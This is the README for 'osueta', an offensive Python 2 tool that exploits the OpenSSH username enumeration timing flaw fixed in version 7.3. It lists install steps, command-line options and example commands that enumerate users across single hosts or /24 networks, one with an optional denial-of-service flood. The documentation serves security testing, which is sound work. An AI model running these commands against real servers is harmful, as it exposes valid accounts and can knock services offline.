***************************************************************************
* ___ ___ ___ _ _ *
* / _ \ _ __ ___ _ _ / __/ __| || | *
* | (_) | '_ \/ -_) ' \\__ \__ \ __ | *
* \___/| .__/\___|_||_|___/___/_||_| *
* |_| *
* _ _ ___ _ _ *
* | | | |___ ___ _ _ | __|_ _ _ _ _ __ ___ _ _ __ _| |_(_)___ _ _ *
* | |_| (_-</ -_) '_| | _|| ' \ || | ' \/ -_) '_/ _` | _| / _ \ ' \ *
* \___//__/\___|_| |___|_||_\_,_|_|_|_\___|_| \__,_|\__|_\___/_||_| *
* *
* _____ _ _ _ _ _ _ *
* |_ _(_)_ __ (_)_ _ __ _ /_\| |_| |_ __ _ __| |__ *
* | | | | ' \| | ' \/ _` | / _ \ _| _/ _` / _| / / *
* |_| |_|_|_|_|_|_||_\__, | /_/ \_\__|\__\__,_\__|_\_\ *
* |___/ *
***************************************************************************
Osueta it's a simple Python2 script to exploit the OpenSSH User Enumeration Timing Attack,
present in OpenSSH versions <= 7.2 and >= 5.* . The script has the ability to make variations
of the username employed in the bruteforce attack, and the possibility to establish
a DOS condition in the OpenSSH server.
http://seclists.org/fulldisclosure/2013/Jul/88
The bug was corrected in OpenSSH version 7.3:
http://www.openssh.com/txt/release-7.3
c0r3dump3d | coredump<@>autistici.org
rofen | rofen<@>gmx.de
We want to give the thanks to Javier Nieto from www.behindthefirewalls.com for his support and help.
Like others offensive tools, the authors disclaims all responsibility in the use of this script.
Debian:
# apt-get install python-ipy python-nmap
# pip install paramiko
# pip install IPy
ArchLinux:
# pacman -S python2-ipy python2-nmap python2-paramiko
$ git clone https://github.com/c0r3dump3d/osueta.git
usage: osueta.py [-h] [-H HOST] [-k HFILE] [-f FQDN] [-p PORT] [-L UFILE]
[-U USER] [-d DELAY] [-v VARI] [-o OUTP] [-l LENGTH]
[-c VERS] [--dos DOS] [-t THREADS]
OpenSSH User Enumeration Time-Based Attack Python script
optional arguments:
-h, --help show this help message and exit
-H HOST Host Ip or CIDR netblock.
-k HFILE Host list in a file.
-f FQDN FQDN to attack.
-p PORT Host port.
-L UFILE Username list file.
-U USER Only use a single username.
-d DELAY Time delay fixed in seconds. If not, delay time is calculated.
-v VARI Make variations of the username (default yes).
-o OUTP Output file with positive results.
-l LENGTH Length of the password in characters (x1000) (default 40).
-c VERS Check or not the OpenSSH version (default yes).
--dos DOS Try to make a DOS attack (default no).
-t THREADS Threads for the DOS attack (default 5).
* A single user enumeration attempt with username variations:
./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes
* A single user enumeration attempt with no user variations a dos attack:
./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes
* Scanning a C class network with only one user:
./osueta -H 192.168.1.0/24 -p 22 -U root -v no
* Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters:
./osueta -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50